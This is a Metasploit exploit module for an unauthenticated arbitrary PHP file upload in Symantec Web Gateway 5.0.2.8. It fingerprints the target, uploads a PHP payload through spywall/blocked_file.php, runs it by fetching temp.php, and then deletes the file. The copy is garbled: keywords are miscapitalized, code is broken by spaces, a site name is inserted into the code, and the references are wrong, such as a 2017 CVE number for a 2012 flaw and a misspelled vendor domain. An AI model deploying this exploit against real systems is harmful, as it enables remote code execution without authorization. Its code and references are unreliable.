Require 'msf/core'
Class Metasploit3 <Msf: Exploit: Remote
Rank = ExcellentRanking
Include Msf: Exploit: Remote: HttpClient
Def initialize (info = {})
Super (update_info (info,
'Name' => "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability ",
'Description' => % q {
This module exploits a file upload vulnerability found in Symantec Web Gateway's
HTTP service. Due to the incorrect use of file extensions in the upload_file ()
Function, this allows us to abuse the spywall/blocked_file.php file in order
Upload a malicious PHP file without any authentication, which results in arbitrary
Code execution.
},
'License '=> MSF_LICENSE,
'Author' =>
[
'Tenable Network security', # Vulnerability Discovery
'Juan vazquez' # Metasploit module
],
'References '=>
[
['Cve', '2017-2012 '],
['Ossvdb', '123'],
['Bid', '123'],
['Url', 'HTTP: // www.zerodayinitiative.com/advisories/ZDI-12-091'],
['Url', 'HTTP: // www.deletec.com/security_response/securityupdates/detail.jsp? Fid = security_advisory & pvid = security_advisory & year = 2012 & suid = 20120517_00 ']
],
'Payload' =>
{
'Badchars' => "\ x00"
},
'Defaultopexception' =>
{
'Exitfunction' => "none"
},
'Platform' => ['php'],
'Arch '=> ARCH_PHP,
'Targets' =>
[
['Symantec Web Gateway 5.0.2.8 ', {}],
],
'Privileged' => false,
'Disclosuredate' => "May 17 2012 ",
'Defaulttarget' => 0 ))
End
Def check
Res = send_request_raw ({
'Method' => 'get ',
'Url' => '/spywall/login. php'
})
If res and res. body = ~ /\ <Title \> Symantec Web Gateway \ <\/title \>/
Return Exploit: CheckCode: Detected
Else
Return Exploit: CheckCode: Safe
End
End
Def on_new_session (client)
If client. type = "meterpreter"
Client. core. use ("stdapi") if not client. ext. aliases. include? ("Stdapi ")
Client. fs. file. rm ("temp. php ")
Else
Client. shell_command_token ("rm temp. php ")
End
End
Def exploit
Uri = target_uri.path
Uri <'/' if uri [-1, 1]! = '/'
Www.2cto.com
Peer = "# {rhost }:# {rport }"
Payload_name = Rex: Text. rand_text_alpha (rand (10) + 5) + '. php'
Before_filename = rand_text_alpha (rand (10) + 5)
After_filename = rand_text_alpha (rand (10) + 5)
Post_data = Rex: MIME: Message. new
Post_data.add_part ("true", nil, nil, "form-data; name = \" submitted \"")
Post_data.add_part (before_filename, "application/octet-stream", nil, "form-data; name = \" before_filename \"")
Post_data.add_part (after_filename, "application/octet-stream", nil, "form-data; name = \" after_filename \"")
Post_data.add_part ("<? Php # {payload. encoded}?> "," Image/gif ", nil," form-data; name = \ "new_image \"; filename = \ "# {payload_name }\"")
Print_status ("# {peer}-Sending PHP payload (# {payload_name })")
Res = send_request_cgi ({
'Method' => 'post ',
'Url' => "# {uri} spywall/blocked_file.php ",
'Ctype '=> "multipart/form-data; boundary =#{ post_data.bound }",
'Data' => post_data.to_s
})
# If the server returns 200 and the body contains the name
# Of the default file, we assume we uploaded the malicious
# File successfully
If not res or res. code! = 200 or res. body !~ /Temp. php/
Print_error ("# {peer}-File wasn't uploaded, aborting! ")
Return
End
Print_status ("# {peer}-Executing PHP payload (# {payload_name })")
# Execute our payload
Res = send_request_cgi ({
'Method' => 'get ',
'Url' => "# {uri} spywall/images/upload/temp. php"
})
# If we don't get a 200 when we request our malicious payload, we suspect
# We don't have a shell, either. Print the status code for debugging purposes.
If res and res. code! = 200
Print_status ("# {peer}-Server returned # {res. code. to_s }")
End
End
End